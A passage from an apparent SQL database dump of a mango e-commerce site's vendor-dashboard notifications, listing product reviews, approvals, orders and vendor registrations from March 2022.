review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-04 06:15:11'),(149,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1131\\\\\\\">Raspuri Mango 3kg</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-04 06:20:31'),(150,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1132\\\\\\\">Raspuri Mango 5kg</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-04 06:21:17'),(151,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1134\\\\\\\">Himasagar Mango 3kg</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-04 06:23:33'),(152,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1135\\\\\\\">Himasagar Mango 5kg</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-04 06:24:22'),(153,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1137\\\\\\\">Malgova Mango 3kg</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-04 06:27:39'),(154,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1138\\\\\\\">Malgova Mango 5kg</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-04 06:29:16'),(155,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1140\\\\\\\">Langra Mango 3kg</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-04 06:37:06'),(156,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1141\\\\\\\">Langra Mango 5kg</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-04 06:37:55'),(157,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1143\\\\\\\">Imam Pasand mango 3kg</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-04 06:40:09'),(158,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1144\\\\\\\">Imam Pasand Mango 5kg</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-04 06:40:51'),(159,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1145\\\\\\\">Combo Pack 5kg</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-04 06:42:04'),(160,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1146\\\\\\\">Combo Pack 10kg</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-04 06:42:44'),(161,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/combo-pack-10kg/\\\\\\\">Combo Pack 10kg</a></b> has been approved.',-1,0,21,1,0,0,0,1,0,'product_review','2022-03-04 06:48:33'),(162,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/combo-pack-5kg/\\\\\\\">Combo Pack 5kg</a></b> has been approved.',-1,0,21,1,0,0,0,1,0,'product_review','2022-03-04 06:48:39'),(163,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/imam-pasand-mango-5kg/\\\\\\\">Imam Pasand Mango 5kg</a></b> has been approved.',-1,0,21,1,0,0,0,1,0,'product_review','2022-03-04 06:48:44'),(164,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/imam-pasand-mango-3kg/\\\\\\\">Imam Pasand mango 3kg</a></b> has been approved.',-1,0,21,1,0,0,0,1,0,'product_review','2022-03-04 06:48:49'),(165,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/langra-mango-5kg/\\\\\\\">Langra Mango 5kg</a></b> has been approved.',-1,0,21,1,0,0,0,1,0,'product_review','2022-03-04 06:48:56'),(166,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/langra-mango-3kg/\\\\\\\">Langra Mango 3kg</a></b> has been approved.',-1,0,21,1,0,0,0,1,0,'product_review','2022-03-04 06:49:03'),(167,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/malgova-mango-5kg/\\\\\\\">Malgova Mango 5kg</a></b> has been approved.',-1,0,21,1,0,0,0,1,0,'product_review','2022-03-04 06:49:12'),(168,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/malgova-mango-3kg/\\\\\\\">Malgova Mango 3kg</a></b> has been approved.',-1,0,21,1,0,0,0,1,0,'product_review','2022-03-04 06:49:18'),(169,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/himasagar-mango-5kg/\\\\\\\">Himasagar Mango 5kg</a></b> has been approved.',-1,0,21,1,0,0,0,1,0,'product_review','2022-03-04 06:49:23'),(170,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/himasagar-mango-3kg/\\\\\\\">Himasagar Mango 3kg</a></b> has been approved.',-1,0,21,1,0,0,0,1,0,'product_review','2022-03-04 06:49:29'),(171,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/raspuri-mango-5kg/\\\\\\\">Raspuri Mango 5kg</a></b> has been approved.',-1,0,21,1,0,0,0,1,0,'product_review','2022-03-04 06:51:36'),(172,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/raspuri-mango-3kg/\\\\\\\">Raspuri Mango 3kg</a></b> has been approved.',-1,0,21,1,0,0,0,1,0,'product_review','2022-03-04 06:51:42'),(173,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/sendura-mango-5kg/\\\\\\\">Sendura Mango 5kg</a></b> has been approved.',-1,0,21,1,0,0,0,1,0,'product_review','2022-03-04 06:51:48'),(174,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/sendura-mango-3kg/\\\\\\\">Sendura Mango 3kg</a></b> has been approved.',-1,0,21,1,0,0,0,1,0,'product_review','2022-03-04 06:51:57'),(175,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/hapus-mango-5kg/\\\\\\\">Hapus Mango 5kg</a></b> has been approved.',-1,0,21,1,0,0,0,1,0,'product_review','2022-03-04 06:52:03'),(176,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/hapus-mango-3kg/\\\\\\\">Hapus Mango 3kg</a></b> has been approved.',-1,0,21,1,0,0,0,1,0,'product_review','2022-03-04 06:52:08'),(177,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/neelam-mango-5kg/\\\\\\\">Neelam Mango 5kg</a></b> has been approved.',-1,0,21,1,0,0,0,1,0,'product_review','2022-03-04 06:52:13'),(178,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/neelam-mango-3kg/\\\\\\\">Neelam Mango 3kg</a></b> has been approved.',-1,0,21,1,0,0,0,1,0,'product_review','2022-03-04 06:52:18'),(179,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/totapuri-mango-5kg-2/\\\\\\\">Totapuri Mango 5kg</a></b> has been approved.',-1,0,21,1,0,0,0,1,0,'product_review','2022-03-04 06:52:23'),(180,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/totapuri-mango-3kg/\\\\\\\">Totapuri Mango 3kg</a></b> has been approved.',-1,0,21,1,0,0,0,1,0,'product_review','2022-03-04 06:52:29'),(181,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/tropicana-slice-fruit-drink-tetrapack-1-2l/\\\\\\\">Tropicana Slice Fruit Drink Tetrapack &#8211; 1.2l</a></b> has been approved.',-1,0,21,1,0,0,0,1,0,'product_review','2022-03-04 06:52:35'),(182,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/banginapalli-mango-5kg/\\\\\\\">Banginapalli Mango 5kg</a></b> has been approved.',-1,0,21,1,0,0,0,1,0,'product_review','2022-03-04 06:52:40'),(183,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/banginapalli-mango-3kg/\\\\\\\">Banginapalli Mango 3kg</a></b> has been approved.',-1,0,21,1,0,0,0,1,0,'product_review','2022-03-04 06:52:46'),(184,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/paper-boat-aamras-tetrapack-1l/\\\\\\\">Paper Boat Aamras Tetrapack &#8211; 1l</a></b> has been approved.',-1,0,21,1,0,0,0,1,0,'product_review','2022-03-04 06:52:51'),(185,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/frooti-mango-drink-plastic-bottle-2l/\\\\\\\">Frooti Mango Drink Plastic Bottle &#8211; 2l</a></b> has been approved.',-1,0,21,1,0,0,0,1,0,'product_review','2022-03-04 06:52:58'),(186,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1159\\\\\\\">Mango Solapur Pickle</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-04 07:35:25'),(187,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1161\\\\\\\">Mango UP style pickle &#8211; 250GM</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-04 07:37:01'),(188,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1163\\\\\\\">Mango hing UP style pickle &#8211; 250GM</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-04 07:38:04'),(189,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1165\\\\\\\">Chhunda or gujarati sweet mango pickle &#8211; 250GM</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-04 07:39:06'),(190,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1167\\\\\\\">MANGO CUT PICKLE &#8211; 500GM</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-04 07:40:48'),(191,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1169\\\\\\\">MANGO THOKKU &#8211; 500GM</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-04 07:42:15'),(192,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1170\\\\\\\">Sweet Mango Pickle</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-04 07:45:16'),(193,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/sweet-mango-pickle-2/\\\\\\\">Sweet Mango Pickle</a></b> has been approved.',-1,0,21,1,0,0,0,1,0,'product_review','2022-03-04 07:48:10'),(194,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/mango-thokku-500gm/\\\\\\\">MANGO THOKKU &#8211; 500GM</a></b> has been approved.',-1,0,21,1,0,0,0,1,0,'product_review','2022-03-04 07:48:17'),(195,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/mango-cut-pickle-500gm/\\\\\\\">MANGO CUT PICKLE &#8211; 500GM</a></b> has been approved.',-1,0,21,1,0,0,0,1,0,'product_review','2022-03-04 07:48:22'),(196,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/chhunda-or-gujarati-sweet-mango-pickle-250gm/\\\\\\\">Chhunda or gujarati sweet mango pickle &#8211; 250GM</a></b> has been approved.',-1,0,21,1,0,0,0,1,0,'product_review','2022-03-04 07:48:28'),(197,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/mango-hing-up-style-pickle-250gm/\\\\\\\">Mango hing UP style pickle &#8211; 250GM</a></b> has been approved.',-1,0,21,1,0,0,0,1,0,'product_review','2022-03-04 07:48:34'),(198,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/mango-up-style-pickle-250gm/\\\\\\\">Mango UP style pickle &#8211; 250GM</a></b> has been approved.',-1,0,21,1,0,0,0,1,0,'product_review','2022-03-04 07:48:40'),(199,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/mango-solapur-pickle/\\\\\\\">Mango Solapur Pickle</a></b> has been approved.',-1,0,21,1,0,0,0,1,0,'product_review','2022-03-04 07:48:46'),(200,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1194\\\\\\\">testmango</a></b> awaiting for review',25,0,0,0,1,0,0,1,0,'product_review','2022-03-07 06:13:44'),(201,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/testmango/\\\\\\\">testmango</a></b> has been approved.',-1,0,25,1,0,0,0,1,0,'product_review','2022-03-07 06:14:57'),(202,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1195\\\\\\\">1195</a></b>',-2,0,0,1,0,0,0,1,0,'order','2022-03-07 06:24:22'),(203,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1195\\\\\\\">1195</a></b> for <b>testmango</b>',-1,0,25,1,0,0,0,1,0,'order','2022-03-07 06:24:22'),(204,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1195\\\\\\\">1195</a></b> for <b>Mango Solapur Pickle</b>',-1,0,21,1,0,0,0,1,0,'order','2022-03-07 06:24:23'),(205,'<b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1195\\\\\\\">1195</a></b> order item <b><a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/mango-solapur-pickle/\\\\\\\">Mango Solapur Pickle</a></b> status updated to <b>Completed</b> by <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/store/mainstore/\\\\\\\">MainStore</a></b>',21,0,0,0,1,0,0,1,0,'status-update','2022-03-07 06:27:11'),(206,'<b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1195\\\\\\\">1195</a></b> order item <b><a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/testmango/\\\\\\\">testmango</a></b> status updated to <b>Completed</b> by <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/store/xyz/\\\\\\\">xyz</a></b>',25,0,0,0,1,0,0,1,0,'status-update','2022-03-07 06:30:17'),(207,'<b>#1195</b> order status updated to <b>Completed</b>',-2,0,0,1,0,0,0,1,0,'status-update','2022-03-07 06:30:20'),(208,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1196\\\\\\\">1196</a></b>',-2,0,0,1,0,0,0,1,0,'order','2022-03-07 07:07:11'),(209,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1196\\\\\\\">1196</a></b> for <b>Mango Solapur Pickle</b>',-1,0,21,1,0,0,0,1,0,'order','2022-03-07 07:07:11'),(210,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1196\\\\\\\">1196</a></b> for <b>Mango hing UP style pickle &#8211; 250GM</b>',-1,0,21,1,0,0,0,1,0,'order','2022-03-07 07:07:11'),(211,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1196\\\\\\\">1196</a></b> for <b>testmango</b>',-1,0,25,1,0,0,0,1,0,'order','2022-03-07 07:07:12'),(212,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1197\\\\\\\">1197</a></b>',-2,0,0,1,0,0,0,1,0,'order','2022-03-07 07:18:35'),(213,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1197\\\\\\\">1197</a></b> for <b>Appemidi 5kg</b>',-1,0,21,1,0,0,0,1,0,'order','2022-03-07 07:18:35'),(214,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1198\\\\\\\">1198</a></b>',-2,0,0,1,0,0,0,1,0,'order','2022-03-07 07:20:55'),(215,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1198\\\\\\\">1198</a></b> for <b>Chhunda or gujarati sweet mango pickle &#8211; 250GM</b>',-1,0,21,1,0,0,0,1,0,'order','2022-03-07 07:20:55'),(216,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1198\\\\\\\">1198</a></b> for <b>Frooti Mango Drink Plastic Bottle &#8211; 600ml</b>',-1,0,21,1,0,0,0,1,0,'order','2022-03-07 07:20:55'),(217,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1199\\\\\\\">1199</a></b>',-2,0,0,1,0,0,0,1,0,'order','2022-03-07 07:23:18'),(218,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1199\\\\\\\">1199</a></b> for <b>Chhunda or gujarati sweet mango pickle &#8211; 250GM</b>',-1,0,21,1,0,0,0,1,0,'order','2022-03-07 07:23:18'),(219,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1199\\\\\\\">1199</a></b> for <b>testmango</b>',-1,0,25,1,0,0,0,1,0,'order','2022-03-07 07:23:18'),(220,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1200\\\\\\\">1200</a></b>',-2,0,0,1,0,0,0,1,0,'order','2022-03-07 07:35:01'),(221,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1200\\\\\\\">1200</a></b> for <b>testmango</b>',-1,0,25,1,0,0,0,1,0,'order','2022-03-07 07:35:01'),(222,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1201\\\\\\\">1201</a></b>',-2,0,0,1,0,0,0,1,0,'order','2022-03-07 09:34:52'),(223,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1201\\\\\\\">1201</a></b> for <b>testmango</b>',-1,0,25,1,0,0,0,1,0,'order','2022-03-07 09:34:52'),(224,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1201\\\\\\\">1201</a></b> for <b>Mango Solapur Pickle</b>',-1,0,21,1,0,0,0,1,0,'order','2022-03-07 09:34:52'),(225,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1194\\\\\\\">testmango</a></b> awaiting for review',25,0,0,0,1,0,0,1,0,'product_review','2022-03-08 11:41:48'),(226,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1263\\\\\\\">Raw Mango 3kg</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-11 11:50:00'),(227,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1084\\\\\\\">Devagad Alphonso 3kg</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-11 11:51:17'),(228,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1086\\\\\\\">Ratnagiri Alphonso 3kg</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-11 11:52:29'),(229,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1264\\\\\\\">Badami Mango 3kg</a></b> awaiting for review',21,0,0,0,1,0,0,1,0,'product_review','2022-03-11 11:55:11'),(230,'New Inquiry <b><a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/enquiry-manage/3\\\\\\\">#000003</a></b> received for <b>Alphonso mango</b>',-2,0,0,1,0,0,0,1,0,'enquiry','2022-03-14 05:06:17'),(231,'New Inquiry <b><a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/enquiry-manage/3\\\\\\\">#000003</a></b> received for <b>Alphonso mango</b>',-1,0,25,1,0,0,0,1,0,'enquiry','2022-03-14 05:06:18'),(233,'<b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/vendors-manage/28\\\\\\\" target=\\\\\\\"_blank\\\\\\\">utftech9</a></b> (Store: <b>utftech</b>) successfully registered to our site.',-2,0,0,1,0,0,0,1,0,'registration','2022-03-15 07:21:53'),(234,'You have successfully registered to our site.',-1,0,28,1,0,0,0,1,0,'registration','2022-03-15 07:21:53'),(235,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1276\\\\\\\">mango</a></b> awaiting for review',28,0,0,0,1,0,0,1,0,'product_review','2022-03-15 07:25:45'),(236,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/mango/\\\\\\\">mango</a></b> has been approved.',-1,0,28,1,0,0,0,1,0,'product_review','2022-03-15 07:26:20'),(237,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1277\\\\\\\">1277</a></b>',-2,0,0,1,0,0,0,1,0,'order','2022-03-15 07:47:55'),(238,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1277\\\\\\\">1277</a></b> for <b>mango</b>',-1,0,28,1,0,0,0,1,0,'order','2022-03-15 07:47:55'),(239,'<b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1277\\\\\\\">1277</a></b> order item <b><a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/mango/\\\\\\\">mango</a></b> status updated to <b>Completed</b> by <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/store/utftech/\\\\\\\">utftech</a></b>',28,0,0,0,1,0,0,1,0,'status-update','2022-03-15 07:49:23'),(240,'<b>#1277</b> order status updated to <b>Completed</b>',-2,0,0,1,0,0,0,1,0,'status-update','2022-03-15 07:49:29'),(241,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1278\\\\\\\">1278</a></b>',-2,0,0,1,0,0,0,1,0,'order','2022-03-15 07:50:57'),(242,'You have received an Order <b>#<a 